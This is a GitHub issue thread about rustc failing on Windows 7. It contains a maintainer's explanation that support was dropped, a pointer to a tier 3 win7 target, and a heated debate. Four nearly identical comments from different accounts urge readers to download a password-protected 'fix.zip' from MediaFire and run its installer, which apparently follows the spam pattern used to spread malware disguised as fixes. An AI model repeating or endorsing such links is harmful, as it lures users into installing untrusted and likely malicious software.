### ISSUE TITLE
rustc can not work on windows 7

### ISSUE THREAD

**Issue by darkread** [rust-lang/rust#129610]
I install rust by rust-init.exe(rust-1.26.0-x86_64-pc-windows-msvc.msi)
and tried this code on windows 7 :

```bash
rustc 
```

I expected to see this happen: 
unable locate Entry point GetSystemTimePreciseAsFileTime on KERNEL32.dll

rustc can not work,cargo same to. I know MS stop support for windows 7, bnt a lot of pc work on windows 7.
With you fix it ?

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Urgau** [comment]
See https://blog.rust-lang.org/2024/02/26/Windows-7.html

The TLDR is that we don't support Windows 7 anymore because neither Microsoft nor Github Actions supports them anymore, making them impossible for them to meet out Tier-1 requirement.

We have however added the tier 3 `x86_64-win7-windows-msvc` target which can be used to cross-compile to Windows 7 with `-Zbuild-std`.

**Comment by victory-wu** [comment]
I couldn't find x86_64-win7-windows-mvc using version 1.8.2

**Comment by sergeevabc** [comment]
Microsoft is a commercial company, so its decisions are dictated by profit. If the support does not promise profit, it will be canceled. But the truth is Windows 7 will work fine for the foreseeable future as long as there are suitable hardware. And there is plenty of such hardware on Earth.

For example, I installed Windows 7 back in 2009 and it still delivers everything I need both on the desktop and on the laptop. It is truly stable and polished enough. Just like the tools in the garage that I inherited from my deceased father — a solid hammer continues to hammer regardless of whether the warranty has expired.

Another truth is that, for example, C(++) apps are still compiled fine here, because C(++) developers don't give a shit about OS EOL. Famous examples are 7-zip, flac, imagemagick, lame, wavpack, xxhash, zstd, and even games like Doom. If a user wants to compile code for a supposedly outdated platform, why restrict their right to do so? Traitors.

**Comment by Noratrieb** [comment]
> If a user wants to compile code for a supposedly outdated platform, why restrict their right to do so?

Because supporting old platforms is an **active effort**. If you want to work on making Rust work on Windows 7, feel free to sign up to become a target maintainer for our Windows 7 targets: https://doc.rust-lang.org/nightly/rustc/platform-support/win7-windows-msvc.html
